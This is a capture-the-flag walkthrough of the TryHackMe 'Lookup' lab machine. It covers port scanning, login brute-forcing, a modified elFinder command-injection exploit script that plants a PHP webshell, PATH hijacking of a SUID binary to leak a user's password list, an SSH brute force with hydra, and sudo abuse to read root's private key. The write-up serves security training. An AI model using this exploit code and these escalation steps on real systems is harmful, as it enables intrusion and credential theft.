๐คLookup
License
The following post by anthonyjsaab is licensed under CC BY 4.0
0 - Introduction
"Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through "Lookup," hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing.๏ปฟ"
Created by tryhackme, and josemlwdf
1 - Port Scans
1a - Discovery
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sS -T4 -p- lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:46 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 260.46 seconds1b - Versioning and OS fingerprinting
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -A -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:51 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.092s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login Page
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 103.29 ms 10.11.0.1
2 99.73 ms lookup.thm (10.10.25.215)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.85 seconds1c - Vulners
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:53 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.75 seconds1z - What we know so far
No interesting CVEs
We have only 2 ports to investigate: 22 and 80
2 - Port 80
2a - Exploring
2b - Enumeration of lookup.thm
2bi - VHOST enum (dead-end)
โโโ(kaliใฟkali)-[~]
โโ$ gobuster vhost -u http://lookup.thm -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain true --proxy http://127.0.0.1:8080 -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://lookup.thm
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] Proxy: http://127.0.0.1:8080
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
=============================================================== 
2bii - Dirbusting (dead-end)
โโโ(kaliใฟkali)-[~]
โโ$ gobuster dir -u http://lookup.thm -w /usr/share/wordlists/dirb/big.txt -x php,txt,xml -t 40 --proxy http://127.0.0.1:8080
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://lookup.thm
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] Proxy: http://127.0.0.1:8080
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,xml
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 275]
/.htaccess.xml (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htpasswd.php (Status: 403) [Size: 275]
/.htaccess.php (Status: 403) [Size: 275]
/.htpasswd.xml (Status: 403) [Size: 275]
/.htpasswd.txt (Status: 403) [Size: 275]
/.htaccess.txt (Status: 403) [Size: 275]
/index.php (Status: 200) [Size: 719]
/login.php (Status: 200) [Size: 1]
/server-status (Status: 403) [Size: 275]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
2biii - Username enumeration
Even if the login form returns a generic response when we submit random credentials, we could still find some clues if the username is correct:
As seen above, there are two specific usernames that, when used, return a different response compared to other usernames. Now the message specifies that the password is wrong, implying that 'admin' and 'jose' are valid usernames.
2biv - Password bruteforcing
Since admin is the more interesting username, we are going to bruteforce the password associated with admin:
A password X stands out. Even though we got the initial error, this password in particular did return a different response than the other attempts.
Since the attempt failed with admin, we will try it with jose:
We now have valid credentials! However, attempting to login to SSH using these credentials will fail. We will stick with HTTP for now. The successful attempt in HTTP sends us to another VHOST. It seems that the absence of a valid cookie was the reason why we did not detect the 'files.lookup.thm' VHOST earlier.
2c - files.lookup.thm: Jackpot?
When logging in successfully in lookup.thm using the browser, we are redirected to this page:
All of these files have credentials in them. None of them are useful when bruteforcing SSH. These files are completely useless.
2d - Exploit & Foothold
Examining the source code, we can locate many instances were elFinder is mentioned. A comment even includes a link to its GitHub repo:
It turns out this file manager for Web is quite popular! With around 7K commits and 5K stars, maybe some exploit is out there?
โโโ(kaliใฟkali)-[~]
โโ$ searchsploit elfinder
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
elFinder 2 - Remote Command Execution (via File Creation) | php/webapps/36925.py
elFinder 2.1.47 - 'PHP connector' Command Injection | php/webapps/46481.py
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit) | php/remote/46539.rb
elFinder Web file manager Version - 2.1.53 Remote Command Execution | php/webapps/51864.txt
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsWe will try the 46481.py exploit. However, we need to tweak it. The Python script should include in the HTTP requests it sends the cookie obtained after a successful login to lookup.thm. The changes are on lines 26, 27, 40, 46, 51, 58
โโโ(kaliใฟkali)-[~]
โโ$ cat 46481.py
#!/usr/bin/python
'''
# Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability in the PHP connector.
# Date: 26/02/2019
# Exploit Author: @q3rv0
# Vulnerability reported by: Thomas Chauchefoin
# Google Dork: intitle:"elFinder 2.1.x"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz
# Version: <= 2.1.47
# Tested on: Linux 64bit + Python2.7
# PoC: https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
# CVE: CVE-2019-9194
# Usage: python exploit.py [URL]
'''
import requests
import json
import sys
headers = {"Host" : "files.lookup.thm"}
cookies = {"REDACTED" : "REDACTED"}
payload = 'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php;echo SecSignal.jpg'
def usage():
if len(sys.argv) != 2:
print "Usage: python exploit.py [URL]"
sys.exit(0)
def upload(url, payload):
files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))}
data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data, headers=headers, cookies=cookies)
j = json.loads(r.text)
return j['added'][0]['hash']
def imgRotate(url, hash):
r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960°ree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash), headers=headers, cookies=cookies)
return r.text
def shell(url):
r = requests.get("%s/php/SecSignal.php" % url, headers=headers, cookies=cookies)
if r.status_code == 200:
print "[+] Pwned! :)"
print "[+] Getting the shell..."
while 1:
try:
input = raw_input("$ ")
r = requests.get("%s/php/SecSignal.php?c=%s" % (url, input), headers=headers, cookies=cookies)
print r.text
except KeyboardInterrupt:
sys.exit("\nBye kaker!")
else:
print "[*] The site seems not to be vulnerable :("
--SNIP--
Running the above tweaked exploit gives us foothold! :
โโโ(kaliใฟkali)-[~]
โโ$ cp ~/Pictures/Samples/sample1.JPG SecSignal.jpg
โโโ(kaliใฟkali)-[~]
โโ$ python2 46481.py http://files.lookup.thm/elFinder
[*] Uploading the malicious image...
[*] Running the payload...
[+] Pwned! :)
[+] Getting the shell...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)3 - Horizontal PrivEsc
3a - LinPEAS
We run LinPEAS on the target machine. In the output of LinPEAS, we can find the following:
-rwsr-sr-x 1 root root 17K Jan 11 2024 /usr/sbin/pwm (Unknown SUID binary!)
pwm is owned by root and has the SUID and SGID bits set! Running the mentioned binary gives the following output:
www-data@lookup:/var$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not foundExfiltrating this binary to my Kali for further analysis:
โโโ(kaliใฟkali)-[~]
โโ$ ltrace ./pwm
puts("[!] Running 'id' command to extr"...[!] Running 'id' command to extract the username and user ID (UID)
) = 67
snprintf("id", 100, "id") = 2
popen("id", "r") = 0x55a711e836b0
__isoc99_fscanf(0x55a711e836b0, 0x55a6d9e33070, 0x7ffdaf89db60, 8) = 1
printf("[!] ID: %s\n", "kali" <no return ...>
--- SIGCHLD (Child exited) ---
[!] ID: kali
<... printf resumed> ) = 13
pclose(0x55a711e836b0) = 0
snprintf("/home/kali/.passwords", 100, "/home/%s/.passwords", "kali") = 21
fopen("/home/kali/.passwords", "r") = 0x55a711e838d0
fgetc(0x55a711e838d0) = 'h'
--SNIP--From the above output, we can see that the pwm binary prints the contents of /home/%s/.passwords, where %s is the output of the call to id . It happens that the user think does have this file, and we cannot read it using www-data:
www-data@lookup:/var$ ls -la /home/think/.passwords
ls -la /home/think/.passwords
-rw-r----- 1 root think 525 Jul 30 2023 /home/think/.passwordsWe can also see from the ltrace output that the program tries to invoke id without specifying the absolute path (lines 5 & 6). We can abuse this ambiguity.
3b - Abusing SUID - Going for think's passwords
We write an executable that gives the same output as id when being run by think:
www-data@lookup:/var$ id think
id think
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ cat id
cat id
#!/bin/bash
echo 'uid=1000(think) gid=1000(think) groups=1000(think)'
www-data@lookup:/tmp$ chmod +x id
chmod +x id
www-data@lookup:/tmp$ ./id
./id
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ which id
which id
/usr/bin/id
www-data@lookup:/tmp$ PATH=.:$PATH
PATH=.:$PATH
www-data@lookup:/tmp$ which id
which id
./idAll is set up correctly. Moment of truth!
www-data@lookup:/tmp$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.28561713c - Bruteforcing SSH
In the previous part, we effectively got a wordlist. We will use it to try and login to SSH using think as a username:
โโโ(kaliใฟkali)-[~]
โโ$ hydra -vV -l think -P /home/kali/think_passwords.txt -t 4 -I ssh://lookup.thm
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-24 19:30:16
[DATA] max 4 tasks per 1 server, overall 4 tasks, 49 login tries (l:1/p:49), ~13 tries per task
[DATA] attacking ssh://lookup.thm:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://[email protected]:22
[INFO] Successful, password authentication is supported by ssh://10.10.125.133:22
[ATTEMPT] target lookup.thm - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose100190" - 5 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10001" - 6 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10.asd" - 7 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10+" - 8 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0_07" - 9 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0990" - 10 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0986$" - 11 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose098130443" - 12 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0981" - 13 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0924" - 14 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0923" - 15 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0921" - 16 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "thepassword" - 17 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose(1993)" - 18 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose'sbabygurl" - 19 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&vane" - 20 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&takie" - 21 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&samantha" - 22 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&pam" - 23 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jlo" - 24 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessica" - 25 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessi" - 26 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "josemario.AKA(think)" - 27 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose.medina." - 28 of 49 [child 3] (0/0)
[22][ssh] host: lookup.thm login: think password: REDACTED!!
[STATUS] attack finished for lookup.thm (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-24 19:30:42We got the password!
โโโ(kaliใฟkali)-[~]
โโ$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 24 Nov 2024 05:31:32 PM UTC
System load: 0.0 Processes: 141
Usage of /: 59.7% of 9.75GB Users logged in: 0
Memory usage: 25% IPv4 address for ens5: 10.10.125.133
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun May 12 12:07:25 2024 from 192.168.14.1
think@lookup:~$ cat user.txt
REDACTED!!4 - Vertical PrivEsc
Right off the bat, the first try at manual enum got me this:
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/lookI also got lucky on how to use look :
think@lookup:~$ sudo look '' "/root/.ssh/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
--SNIP--
-----END OPENSSH PRIVATE KEY-----We will save the private key of root@lookup to my kali in a file named root. We adjust its permission, and login to SSH using it:
โโโ(kaliใฟkali)-[~]
โโ$ nano root
โโโ(kaliใฟkali)-[~]
โโ$ chmod 600 root
โโโ(kaliใฟkali)-[~]
โโ$ ssh -i root [email protected]
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 24 Nov 2024 05:59:10 PM UTC
System load: 0.0 Processes: 147
Usage of /: 59.7% of 9.75GB Users logged in: 1
Memory usage: 25% IPv4 address for ens5: 10.10.125.133
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon May 13 10:00:24 2024 from 192.168.14.1
root@lookup:~# cat root.txt
REDACTED!!Last updated
Was this helpful?